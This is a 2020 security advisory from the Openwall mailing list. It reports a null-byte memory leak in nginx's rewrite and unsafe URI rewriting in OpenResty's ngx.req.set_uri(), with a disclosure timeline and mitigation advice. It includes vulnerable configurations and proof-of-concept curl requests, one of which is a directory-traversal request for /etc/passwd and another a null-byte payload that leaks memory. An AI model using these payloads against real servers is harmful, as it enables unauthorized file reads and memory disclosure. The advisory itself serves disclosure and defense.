Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 18 Mar 2020 16:10:32 +0300
From: Vladimir Dubrovin <>
Subject: Insecure implementation of OpenResty ngx.req.set_uri + memory content
 leak in nginx.

OpenResty is LUA engine for nginx reverse proxy.

Affected versions: tested on nginx-1.17.5 and openresty- on
ubuntu 18.04

Two independent problems were identified in OpenResty and nginx,
potentially leading to different security vulnerabilities: Header
injection/CRLF injection, directory traversal/local file read,
restrictions bypass, memory content disclosure in some nginx + openresty

1. There is a bug in nginx "rewrite" implementation. It can disclose the
fragment of the process memory with 301/302 HTTP reply if rewrite string
contains ASCII 0 character. Within nginx itself rewrite string is a
static configuration option, and is not supposed to be manipulated

2. OpenResty implements ngx.req.set_uri() via raw rewrite in nginx
without any additional filtering or normalization. If used with
untrusted input it can lead to CRLF/header injection, directory
traversal/local file read, restrictions bypass. Due to (1) it can also
lead to memory content disclosure.


As of now, there is no fix for ngx.req.set_uri(), this function must be considered as potentially unsafe.


Avoid usage of ngx.req.set_uri() with untrusted input or implement strict input filtering.



21.03.2019 - Memory content leak reported to Mail.Ru team via H1 by @maxarr in
22.03.2019 - Memory content leak is mitigated on Mail.Ru side
05.11.2019 - Problem additionally researched by Denis 'KPEBETKA' Denisov and Nikolay Ermishkin of Mail.Ru Security Team, root cause tracked to nginx+openresty.
07.11.2019 - Reported to nginx team
08.11.2019 - Acknowledged by nginx team
13.12.2019 - nginx team reported back the issue is not tracked as a security bug in nginx, secure rewrite will not be provided by nginx API
16.12.2019 - memory leak bug fixed in nginx master branch
17.12.2019 - reported to OpenResty team
17.12.2019 - acknowledged by OpenResty team
18.03.2020 - disclosed



This configuration demonstrates memory content leak in nginx:

Vulnerable config (^@ is a null byte)

location ~ /memleak {
    rewrite ^.*$ "^@...fasdfasdfasdfasdfasdfasdfasdfasdfasdfasdasdf";

location / {
    root html;
    index index.html index.htm;

curl localhost:8337/memleak -vv
Location: http://localhost:8337/WjWj

WjWj – is a random peace of memory, usual includes parts of other requests

vulnerable code:

last = ngx_http_map_uri_to_path(r, &path, &root, 0);

Doesn't handle location with null byte properly

last = ngx_cpystrn(last, r-> + alias, r->uri.len - alias + 1);

Writes only null byte to last, not the whole r->

if (!clcf->alias && clcf->root_lengths == NULL && r->args.len == 0) {

It's important to get into this conditional branch to get memory leak

r->headers_out.location->value.len = len;

location length more than was really written, location ends with random
piece of memory (usually includes part of other HTTP requests).

Example of configuration vulnerable to  memory leak with

location ~ /memleak {
    rewrite_by_lua_block {
        local args, err = ngx.req.get_post_args();
        ngx.req.set_uri( args["url"], true );

location / {
    root html;
    index index.html index.htm;

curl localhost:8337 -d "url=%00asdfasdfasdfasdfasdfasdfasdfasdf" -vv
Location: http://localhost:8337/WjWj

Example of configuration vulnerable to directory traversal with

location ~ /rewrite {
    rewrite ^.*$ $arg_x;

location / {
    root html;
    index index.html index.htm;

curl localhost:8337/rewrite?x=/../../../../../../../etc/passwd

-- Vladimir Dubrovin

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.